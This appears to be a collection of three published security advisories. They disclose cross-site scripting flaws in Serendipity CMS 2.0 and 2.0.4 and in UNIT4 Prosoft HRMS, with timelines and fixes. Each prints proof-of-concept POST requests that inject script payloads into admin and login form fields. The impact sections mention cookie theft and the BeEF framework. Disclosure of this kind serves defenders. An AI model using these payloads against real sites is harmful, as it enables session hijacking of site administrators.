Category: Advisory

[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4

[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4

Product Information:

Software: Serendipity CMS

Tested Version: 2.0.4, released 26.09.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4

Description: Serendipity is a PHP-powered weblog engine that gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)

Vulnerability description:

There are two XSS vulnerabilities in Serendipity CMS.

1) XSS in the creation of a new category page

2) XSS in the creation of the base directory page

Category Page

When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS.

The payload is executed when an authenticated user creates another category.

Base Directory Page

When an authenticated user of Serendipity CMS is creating a new base directory, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directory

The parameter serendipity[name] is vulnerable to reflected XSS.

The payload is executed immediately upon creating the new directory and it occurs only once.

Impact:

An attacker is able to inject malicious scripts into otherwise benign and trusted websites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of an HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).

Solution:

Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html

Timeline:

Vulnerability found: 25.11.2016

The vendor informed: 26.11.2016

Response by vendor: 28.11.2016

Fix by vendor: 28.11.2016

Public Advisory: 03.12.2016

Reference:

https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be

[CVE-2015-2289] Serendipity CMS – XSS Vulnerability in Version 2.0

Serendipity CMS – XSS Vulnerability in Version 2.0

Product Information:

Software: Serendipity CMS

Tested Version: 2.0, released 23.1.2015

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: http://www.s9y.org/12.html

Description: Serendipity is aimed to make everything possible you ever wish for. It is technically up to par to other well-known weblog scripts like Moveable Type or WordPress. (copied from http://www.s9y.org/3.html)

Vulnerability description:

XSS is found in category creation page. When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:

POST /serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 394
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/serendipity-2.0/serendipity/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: serendipity[old_session]=q8jagkbn03i41p1hea1vp3mqi7; serendipity[author_token]=906de2dd7201b75f1f710f59128e1ffb5cec6cf4; serendipity[userDefLang]=en; serendipity[toggle_extended]=true; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=; serendipity[sortorder_order]=; serendipity[sortorder_ordermode]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_f857b4bc988a333c379a2d9bd477dd65=q8jagkbn03i41p1hea1vp3mqi7

serendipity%5Btoken%5D=b95339bd8490707038719715c6d58e63&serendipity%5Bcat%5D%5Bname%5D=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&serendipity%5Bcat%5D%5Bdescription%5D=&serendipity%5Bcat%5D%5Bparent_cat%5D=0&serendipity%5Bcat%5D%5Bhide_sub%5D=0&serendipity%5Bcat%5D%5Bread_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bwrite_authors%5D%5B%5D=0&serendipity%5Bcat%5D%5Bicon%5D=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS. The payload is executed when an authenticated user navigates to the “New Entry” page.

Impact:

An attacker is able to leverage on the XSS vulnerability to exploit the content creator of Serendipity CMS. An example would be to inject malicious JavaScript code in order to use attacking tools like BeEF.

Solution: Update to the latest version, which is 2.0.1, see http://blog.s9y.org/archives/263-Serendipity-2.0.1-released.html

Timeline:

Vulnerability found: 12.3.2015

Vendor informed: 12.3.2015

Response by vendor: 12.3.2015

Fix by vendor 12.3.2015

Public Advisory: 13.3.2015

Reference: https://github.com/s9y/Serendipity/commit/a30886d3bb9d8eeb6698948864c77caaa982435d

This advisory is also available on securityfocus.

[CVE-2015-2082] UNIT4 Prosoft HRMS XSS Vulnerability

# Vulnerability type: Cross-site Scripting

# Vendor: http://www.unit4.com/

# Product: UNIT4 Prosoft HRMS

# Product site: http://www.unit4apac.com/products/prosofthrms

# Affected version: 8.14.230.47

# Fixed version: 8.14.330.43

# Credit: Jerold Hoong & Edric Teo

# PROOF OF CONCEPT

The login page of UNIT4’s Prosoft HRMS is vulnerable to cross-site scripting.

POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyO
Q9kFgQCAQ9kFgICAQ8WAh4EVGV4dAVfPGxpbmsgcmVsPSJTSE9SVENVVCBJQ09OIiBo
cmVmPSJBcHBfVGhlbWVzL1BTRGVmYXVsdC9JbWFnZXMvRmF2SWNvbi5pY28iIHR5cGU
9ImltYWdlL3gtaWNvbiIgLz5kAgMPZBYKAgEPZBYCAgMPDxYCHgdWaXNpYmxlaGRkAg
MPZBYCZg8PFgIfAAU0VGhlIGNvZGUgY29udGFpbnMgaW52YWxpZCBjaGFyYWN0ZXJzL
iAoVVNSLlVzZXJDb2RlKWRkAgUPDxYCHwAFBlY4IFVBVGRkAgcPZBYWAgEPZBYEAgEP
DxYCHwAFC0NsaWVudCBDb2RlZGQCBQ8PFgIeDEVycm9yTWVzc2FnZQUIUmVxdWlyZWR
kZAIDD2QWBAIBDw8WAh8ABQZTZXJ2ZXJkZAIDDxBkZBYAZAIFD2QWBAIBDw8WAh8ABQ
hEYXRhYmFzZWRkAgUPDxYCHwIFCFJlcXVpcmVkZGQCBw9kFgQCAQ8PFgIfAAULTERBU
CBEb21haW5kZAIDDxBkZBYAZAIJDw8WAh8ABQdVc2VyIElEZGQCCw8PZBYCHgxhdXRv
Y29tcGxldGUFA29mZmQCDQ8PFgIfAgUIUmVxdWlyZWRkZAIPDw8WAh8ABQhQYXNzd29
yZGRkAhMPDxYCHwFoZBYEAgEPDxYCHwAFCExhbmd1YWdlZGQCAw8QZGQWAGQCFQ8PFg
IfAAUVRm9yZ290IHlvdXIgcGFzc3dvcmQ%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyF
TQgKAAh4FV2lkdGgbAAAAAADAUkABAAAAZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcH
lyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQdGUgTHRkLiBBbGwgUmlna
HRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3yxmGD
Z9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQ
K1qbSRCwLWxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E
%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&txtPassword=&btnSignIn=S
ign+In

# TIMELINE

28/10/2014: Vulnerability found

04/11/2014: Vendor informed

04/11/2014: Vendor responded

30/11/2014: Vendor fixed the issue

14/02/2015: Public disclosure

This advisory is also available on securityfocusCVE Mitre and Jerold Hoong’s blog.